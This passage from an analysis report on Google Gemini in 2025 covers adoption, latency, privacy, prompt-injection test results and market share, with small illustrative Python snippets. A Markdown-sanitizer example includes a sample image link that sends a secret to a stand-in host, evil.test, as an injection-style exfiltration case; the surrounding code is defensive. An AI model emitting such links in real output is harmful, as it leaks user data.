- Adopted across industries for:

- Marketing automation

- Technical support agents

- Internal workflow bots

- Gemini Code Assist

- Multi-file editing

- Real-time chat support within IDEs

- Available on Gemini 2.5 Pro and Flash variants

- Feature Rollouts

- Gemini Live: Real-time app interfacing with multimodal support

- Circle to Search: Contextual AI dialogue from visual content

- Wear OS 6: First smartwatch integration for on-the-go task handling

Gemini Feature Adoption Matrix (2025)

| Feature/Capability | User Base or Adoption Trend | Contextual Insight |

|---|---|---|

| AI Overviews | 1.5B monthly users | Foundation of Google Search UX |

| Gemini Code Assist | Rapid enterprise developer adoption | IDE-native coding assistant |

| Gemini App Usage (2.5 Pro) | +45% usage increase since March 2025 | Indicates core model demand in product suite |

| Gemini on Wear OS | First-gen rollout in Q3 2025 | Expanding into mobile wearables |

Challenges Undermining Plugin and Agentic Performance

Despite aggressive expansion and adoption, Gemini’s plugin and agentic architecture faces critical operational barriers:

Technical Shortcomings

- Latency Bottlenecks

- Gemini 2.5 Pro latency

- Average: 35 seconds

- 99th percentile: 8 minutes

- Performance unsuitable for real-time or mobile-centric tasks.

- Critical Bugs

- Infinite loop generation

- Leads to massive token use, billing surges

- Escalates financial risk for developers

- Inconsistent Execution

- Plugin calls occasionally fail silently or return malformed data

- “Sticky memory” bugs lead to file misreads and corrupted tasks

User Trust Erosion Factors

- Mobile Bounce Rates

- Desktop bounce rate: 27%

- Mobile bounce rate: ~45%

- Suggests mobile experience quality or latency bottlenecks are driving abandonment

- Privacy Concerns

- Automatic access to device-level data on Android (activated by default)

- Lack of granular user consent may raise regulatory alarms and user distrust

Ecosystem Risk Assessment Table

| Risk Area | Status/Metric (2025) | Impact on Ecosystem Growth |

|---|---|---|

| Infinite generation loops | Recurrent on Gemini Flash | Financial exposure and operational risk |

| API call failures | Documented on forums | Unreliable plugin orchestration |

| Mobile latency/user churn | 45% mobile bounce rate | Hampers Gemini’s penetration in mobile-first regions |

| Privacy-related drop-offs | Android data collection (default) | May trigger user opt-outs in sensitive markets |
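
For the API call failures and rate-limiting issues listed in the table, a standard client-side mitigation is retrying with exponential backoff and jitter. The sketch below is generic and makes no claim about any Gemini SDK: `RateLimitError` is a hypothetical stand-in for whatever exception a given client raises on a rate-limit response, and the delay parameters are arbitrary defaults.

```python
import random
import time


class RateLimitError(Exception):
    """Hypothetical stand-in for a client's rate-limit (HTTP 429) exception."""


def call_with_backoff(fn, max_attempts=5, base_delay=1.0, max_delay=30.0,
                      sleep=time.sleep, rng=random.random):
    """Call fn(), retrying on RateLimitError with capped exponential backoff."""
    for attempt in range(max_attempts):
        try:
            return fn()
        except RateLimitError:
            if attempt == max_attempts - 1:
                raise  # out of attempts: surface the error to the caller
            cap = min(max_delay, base_delay * 2 ** attempt)
            sleep(cap * rng())  # full jitter: wait a random fraction of the cap
```

The `sleep` and `rng` parameters exist so the behavior can be tested deterministically; in production the defaults apply. Backoff reduces failed queries under load but does not address the underlying quota, so sustained high-throughput workloads may still be better served by batch mode.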

Conclusion: Foundation Built, Reliability Pending

Google Gemini’s custom GPT, plugin ecosystem, and agentic integration represent some of the most advanced AI infrastructure available in 2025. Its broad platform reach—from Google Search to Wear OS—demonstrates Google’s vision of ambient intelligence. However, for Gemini to evolve from powerful to indispensable, Google must address technical reliability, mobile UX, and privacy transparency with the same vigor it invests in feature rollouts.

10. Challenges & Future Outlook

As Google Gemini matures in capability and reach, its evolution in 2025 reflects the broader truth of generative AI’s trajectory: progress often arrives faster than the systems designed to regulate, secure, and evaluate it. Gemini’s journey is emblematic of the balance between rapid innovation and the imperative for responsible deployment, user trust, and system integrity.

Current Limitations: Where Gemini Still Struggles

Despite remarkable progress, several fundamental challenges continue to hinder Gemini’s pursuit of AI dominance. These issues are not merely technical imperfections but structural hurdles that define the edge of current generative model capabilities.

Latency and Real-Time Performance Constraints

- Gemini 2.5 Pro exhibits persistent high latency, particularly in production and enterprise workflows.

- Average response times are around 35 seconds, with 99th percentile latency reaching 8 minutes in some scenarios.

- Although batch processing has been introduced to optimize non-time-sensitive tasks, real-time interactivity remains a critical bottleneck, particularly on mobile devices and embedded systems.
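The gap between the average and the 99th percentile is what matters most for real-time use, because a small share of very slow requests can dominate the tail while barely moving the mean. The sketch below computes both from a list of request latencies using the nearest-rank percentile definition. The sample values are hypothetical, chosen only so that the mean lands near 35 seconds and P99 at 8 minutes; they are not measured Gemini data.

```python
import math
from statistics import mean


def percentile(samples: list[float], pct: float) -> float:
    """Nearest-rank percentile: the smallest sample with at least pct% of values at or below it."""
    if not samples:
        raise ValueError("samples must not be empty")
    ordered = sorted(samples)
    rank = max(1, math.ceil(pct * len(ordered) / 100))
    return ordered[rank - 1]


# Hypothetical latencies in seconds: 98 typical requests and 2 pathological ones.
samples = [26.0] * 98 + [480.0] * 2

print(f"mean = {mean(samples):.2f} s")        # mean = 35.08 s
print(f"p50  = {percentile(samples, 50)} s")  # p50  = 26.0 s
print(f"p99  = {percentile(samples, 99)} s")  # p99  = 480.0 s
```

In this toy distribution the median request finishes in 26 seconds, yet one request in fifty takes 8 minutes, which is why tail percentiles rather than averages are the usual basis for real-time service targets.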

Factual Reliability and Hallucination Management

- Google reports hallucination rates below 2.7% in zero-shot reasoning tasks, a notable achievement.

- However, cross-domain factual consistency and output stability remain imperfect, especially under ambiguous prompts or high-context requests.

- This underscores a broader LLM challenge: the absence of persistent, real-world grounding across variable contexts.

Security Vulnerabilities: Prompt Injection

- Gemini still demonstrates susceptibility to indirect prompt injection techniques.

- A 0% pass rate on Pliny Prompt Injection tests and 66.67% vulnerability to direct PII exposure highlight the limits of current defenses.

- Despite multilayer safeguards—like Markdown sanitization and classifier gating—adversarial input manipulation remains a viable threat vector, especially in open-ended applications.
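To make the idea of Markdown sanitization concrete, the sketch below strips images and non-allow-listed links from model output before it is rendered, since an injected instruction can otherwise smuggle data out through a URL. This is a simplified illustration, not Google's implementation: `sanitize_markdown`, the regular expressions, and the `ALLOWED_HOSTS` set are all assumptions, and a production filter would need a real Markdown parser.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list; a real deployment would configure its own hosts.
ALLOWED_HOSTS = {"example.com"}

_IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")
_LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]*)[^)]*\)")


def sanitize_markdown(text: str) -> str:
    """Replace images with their alt text and untrusted links with their label."""
    # Images are fetched automatically by most renderers, so drop them all.
    text = _IMAGE.sub(lambda m: m.group(1), text)

    def _filter_link(match: re.Match) -> str:
        label, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and (parsed.hostname or "") in ALLOWED_HOSTS:
            return match.group(0)  # keep trusted links unchanged
        return label               # otherwise keep only the visible text

    return _LINK.sub(_filter_link, text)


raw = "See ![x](https://evil.test/?q=secret) and [docs](https://example.com/a) and [click](http://evil.test)"
print(sanitize_markdown(raw))
# See x and [docs](https://example.com/a) and click
```

A filter like this only narrows one exfiltration channel; it does nothing to stop the model from following injected instructions in the first place, which is consistent with the point above that sanitization alone leaves the threat vector open.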

Bias and Limited Fairness Evaluations

- Gemini’s fairness assessments are predominantly based on American English datasets.

- This raises significant concerns about bias when applied to non-Western cultures, dialects, or minority languages.

- The limited scope of bias detection means important disparities in user experience may remain undetected, particularly in global deployments.

Data Privacy, Consent, and Regulatory Exposure

- Automatic data access permissions granted to Gemini on Android, including access to phone, SMS, and WhatsApp by default, have alarmed privacy advocates.

- The absence of explicit user consent for these integrations has triggered regulatory inquiries in Europe and elsewhere.

- This “privacy-washing” perception risks long-term reputational damage if not addressed through more transparent policies.

Benchmark Saturation and Evaluation Challenges

- Gemini 2.5 Pro is now approaching upper performance bounds on traditional benchmarks, which no longer differentiate effectively between top-tier models.

- This “benchmark inflation” makes it difficult to measure nuanced improvements or regressions, potentially obscuring latent weaknesses.

Key Limitations Summary Table

| Category | Status/Metric | Implication |
|---|---|---|
| Latency | 35 s average, 8 min P99 (Gemini 2.5 Pro) | Limits real-time usability across platforms |
| Hallucination | <2.7% in zero-shot tasks | Still struggles with broad factual generalization |
| Prompt Injection Security | 0% pass rate on Pliny prompt injection tests; 66.67% vulnerability to direct PII exposure | Continues to expose data and trust risks |
| Fairness | Limited to American English evaluation | Potential global bias, under-tested across linguistic domains |
| Data Privacy | Automatic permissions (Android) | Potential regulatory breach and user backlash |
| Benchmark Saturation | Models outperform existing tests | Obscures performance gaps, complicates validation |

Strategic Trajectory and Near-Term Innovations

Google’s vision for Gemini is as bold as it is expansive: to embed the model as an “ambient, agentic intelligence” across the digital fabric of users’ lives. This direction is anchored in multi-device interoperability, real-time responsiveness, and autonomous task execution.

AI Agents and Orchestration Layers

- Google is investing heavily in Gemini Agents, built to:

  - Interpret context from multiple modalities

  - Plan and execute multi-step tasks autonomously

  - Connect seamlessly with APIs, tools, and apps through function-calling infrastructure

- These agents are no longer experimental; enterprise workflows are increasingly being designed around agentic architectures using Gemini.
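The plan, call, and observe cycle behind function calling can be sketched in a few lines. The example below is a generic illustration rather than Gemini's actual API: `stub_model`, `get_weather`, `TOOLS`, and the message format are hypothetical stand-ins, with the stub replacing a real model call so the loop can run on its own.

```python
import json
from typing import Callable


def get_weather(city: str) -> dict:
    """Hypothetical tool that returns canned data instead of calling a service."""
    return {"city": city, "forecast": "sunny"}


# Registry of tools the agent is allowed to call (assumed for this sketch).
TOOLS: dict[str, Callable[..., object]] = {"get_weather": get_weather}


def stub_model(history: list[dict]) -> dict:
    """Stand-in for a model call: request one tool, then produce a final answer."""
    if not any(message["role"] == "tool" for message in history):
        return {"type": "tool_call", "name": "get_weather", "args": {"city": "Zurich"}}
    result = json.loads(history[-1]["content"])
    return {"type": "final", "text": f"It is {result['forecast']} in {result['city']}."}


def run_agent(prompt: str, model=stub_model, max_steps: int = 5) -> str:
    """Alternate between model turns and tool executions until a final answer."""
    history = [{"role": "user", "content": prompt}]
    for _ in range(max_steps):
        reply = model(history)
        if reply["type"] == "final":
            return reply["text"]
        tool = TOOLS.get(reply["name"])
        if tool is None:
            # Fail loudly rather than silently skipping an unknown call.
            raise ValueError(f"model requested unknown tool {reply['name']!r}")
        result = tool(**reply["args"])
        history.append({"role": "tool", "content": json.dumps(result)})
    raise RuntimeError("agent did not finish within max_steps")


print(run_agent("What is the weather in Zurich?"))
# It is sunny in Zurich.
```

The step cap and the explicit error on unknown tools are deliberate design choices: they bound cost when a model keeps requesting tools and surface orchestration failures instead of letting them pass unnoticed.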

Deep Think Mode and Enhanced Reasoning

- The introduction of “Deep Think” in Gemini 2.5 Pro marks a shift toward multi-pass cognitive reasoning, akin to human deliberation.

- Enables advanced reasoning for mathematics, programming, and logic-heavy queries

- Designed to generate multiple hypotheses before concluding, improving output stability
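Google has not published how Deep Think works internally, so the following is only a loose analogy for why considering several candidates can stabilize output. It shows majority voting over independently sampled answers, often called self-consistency. The `majority_answer` function and the `sample` callback are hypothetical names introduced for this sketch.

```python
from collections import Counter
from typing import Callable


def majority_answer(sample: Callable[[int], str], n: int = 5) -> tuple[str, float]:
    """Draw n candidate answers and return the most common one with its vote share."""
    if n < 1:
        raise ValueError("n must be at least 1")
    # Normalize lightly so trivially different spellings count as the same vote.
    votes = Counter(sample(i).strip().lower() for i in range(n))
    answer, count = votes.most_common(1)[0]
    return answer, count / n


# Canned candidates standing in for five independent model samples.
candidates = ["42", "41", "42 ", "42", "40"]
print(majority_answer(lambda i: candidates[i], n=5))
# ('42', 0.6)
```

The vote share doubles as a rough confidence signal: a low share suggests the candidates disagree and the query may deserve more samples or human review.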

Gemini Ultra and Model Scaling

- The anticipated release of Gemini Ultra and Gemini Ultra 2 is expected to bring substantial gains in reasoning, code generation, and real-world simulation.

- Ultra-class models are expected to surpass existing SOTA (state-of-the-art) capabilities

- Designed for enterprise automation, synthetic agentic systems, and complex planning tasks

Android–ChromeOS Convergence

- In July 2025, Google confirmed the long-speculated merger of Android and ChromeOS, laying the foundation for:

  - Unified AI architecture across mobile and desktop

  - Native support for Gemini Nano, an embedded LLM for offline and low-latency generative tasks

  - A cohesive ecosystem experience through Android 16, with real-time Gemini inference on-device

Creative AI Ecosystem Expansion

- Google’s creative AI portfolio now includes:

  - Veo 3: Real-time video generation with native audio sync

  - Imagen 4: Ultra-high-resolution image generation

  - Flow: Storyboard-to-video AI filmmaking tool

  - Lyria 2: Advanced AI music composition

- These tools, coupled with Gemini’s general-purpose reasoning, are being deployed for content production, marketing, and entertainment use cases.

Real-Time Multimodal Interaction

- Gemini Live, integrating Project Astra, allows camera-based input and screen-sharing, enabling real-time AI-driven support.

- Search Live facilitates context-aware, camera-guided search experiences, offering a glimpse into a future of persistent, sensory AI assistance.

Competitive Market Position and Strategic Differentiators

Google may trail OpenAI’s ChatGPT and Microsoft Copilot in direct chatbot market share, but it is rapidly solidifying a leadership position in enterprise AI and data platforms.

Cloud & AI Platform Recognition

- Named a Leader in Gartner’s 2025 Magic Quadrant for Data Science & ML Platforms

- Ranked a Leader in Forrester’s Data Management for Analytics Q2 2025

- Gemini, as part of Google Cloud’s AI stack, is integrated into:

  - BigQuery

  - Vertex AI

  - Looker Studio

  - Google Workspace APIs

This platform-based strategy enables Google to offer end-to-end solutions—from data ingestion to model fine-tuning, deployment, and governance.

Generative AI Market Share Snapshot (July 2025)

| AI Platform | LLMs Used | Search Market Share | Quarterly User Growth | Monthly Active Users (MAU) |
|---|---|---|---|---|
| ChatGPT | GPT-3.5, GPT-4 | 60.5% | 7% | ~950M |
| Microsoft Copilot | GPT-4 | 14.3% | 6% | N/A |
| Google Gemini | Gemini | 13.5% | 8% | 400M |
| Perplexity | Mistral, LLaMA 2 | 6.2% | 10% | N/A |
| Claude AI | Claude 3 | 3.2% | 14% | N/A |
| Grok | Grok 2 / 3 | 0.8% | 6% | N/A |
| DeepSeek | DeepSeek V3 | 0.5% | 10% | N/A |

Conclusion: The Road Ahead for Gemini

The state of Google Gemini in 2025 is a paradox of extraordinary promise shadowed by substantial growing pains. On one hand, Gemini is redefining what AI can do, from ambient, multimodal interaction to scalable enterprise automation. On the other, challenges such as latency, hallucination, bias, and privacy threaten to erode hard-won gains in user trust and platform stability.

Moving forward, Google must:

- Sustain aggressive innovation in model architecture and agentic design

- Double down on responsible AI development and regulatory transparency

- Resolve platform-level bugs and enhance real-time reliability, especially on mobile

- Expand fairness testing across global linguistic and cultural spectrums

If addressed strategically, these efforts could elevate Gemini from a competitive AI product to a ubiquitous, indispensable layer of the digital world.

11. Strategic Implications

Google Gemini has emerged in 2025 as a technologically sophisticated and widely deployed generative AI platform. Positioned at the intersection of high-performance reasoning, agentic automation, and deep product integration, Gemini plays a pivotal role in Google’s ambition to define the AI-first era. However, beneath the platform’s momentum lies a complex strategic landscape—one marked by intensifying competition, technical bottlenecks, and rising scrutiny from privacy advocates and enterprise users alike.

Gemini’s Strategic Positioning in 2025: Strengths and Headwinds

Core Strengths of Gemini in 2025

- Advanced “Thinking Model” Architecture:

- Gemini 2.5 Pro exhibits notable capabilities in long-context reasoning and code generation.

- Excels in zero-shot and few-shot benchmarks across domains such as mathematics, language translation, and structured planning.

- Multimodal Intelligence with Expansive Context Windows:

- Natively supports text, images, code, voice, and video inputs.

- Up to 1 million token context windows allow for highly coherent long-form outputs and full project-level comprehension.

- Seamless Ecosystem Integration:

- Embedded across Search, Android, Google Workspace, Chrome, Pixel, and Wear OS, enabling a ubiquitous AI presence.

- Gemini Nano powers on-device inferencing in Android 16, reducing latency and dependency on cloud processing.

- Enterprise Traction:

- As of mid-2025, Gemini serves 400 million monthly active users, with 63% of usage driven by enterprise workflows.

- Adoption rates are highest in healthcare, finance, and real estate, driven by Gemini’s automation capabilities.

Critical Challenges Undermining Adoption

| Challenge Area | Description | Implication |
|---|---|---|
| API Latency | Gemini 2.5 Pro averages 35s latency with P99 spikes to 8 minutes | Undermines real-time user experiences and production viability |
| Prompt Injection Risks | 0% pass rate on several adversarial prompt injection tests | Indicates persistent vulnerability in enterprise-grade deployments |
| Automatic Data Permissions | Broad Android data access activated by default | Provokes regulatory attention and threatens user trust |
| Benchmark Saturation | Traditional LLM benchmarks no longer differentiate elite models | Risks misleading performance metrics; slows validation of real progress |
| Market Share Gap | Gemini trails ChatGPT and Microsoft Copilot in direct chatbot usage | Indicates fragmented market penetration despite ecosystem leverage |

Strategic Direction: Google’s Long-Term AI Vision